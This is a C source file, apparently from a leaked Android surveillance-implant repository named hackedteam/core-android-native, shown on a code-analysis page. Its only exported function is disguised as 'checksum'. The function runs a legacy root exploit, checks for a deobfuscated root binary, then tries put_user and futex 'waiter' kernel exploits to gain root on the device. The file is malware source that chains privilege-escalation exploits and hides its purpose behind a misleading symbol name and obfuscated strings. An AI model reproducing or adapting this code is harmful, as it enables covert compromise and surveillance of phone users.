hackedteam/core-android-native

View on GitHub
selinux_native/jni/remote_main/remote_main_lib.c

Summary

Maintainability
Test Coverage
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include "lib_put_user.h"
#include "waiter_exploit.h"
#include "log.h"
#include "remote_main_lib.h"
#include "shell_installer.h"
#include "shell_params.h"

// Should be the only exported symbol
__attribute__ ((visibility ("default"))) int checksum(void) {

  struct stat st;

  LOGD("[CHECK] STARTING EXPLOITATION\n");

  exec_legacy_exploit();

  if(stat(deobfuscate(ROOT_BIN), &st) < 0) {
    LOGD("[CHECK] Legacy exploitation failed\n");
  }
  else {
    LOGD("[CHECK] Legacy exploitation succeded!\n");
    return 1;
  }

  if(put_user_check_exploitability()) {
    LOGD("[CHECK] Put_user exploit available\n");
    return put_user_get_root(NULL, NULL);
  }
  else if(waiter_exploit_check_exploitability()) {
    LOGD("[CHECK] Waiter exploit available\n");
    return waiter_exploit_get_root(NULL, NULL);
  }
  else {
    LOGD("[CHECK] Device doesn't appear to be vulnerable.... giving up!!\n");
  }

  return 0;

}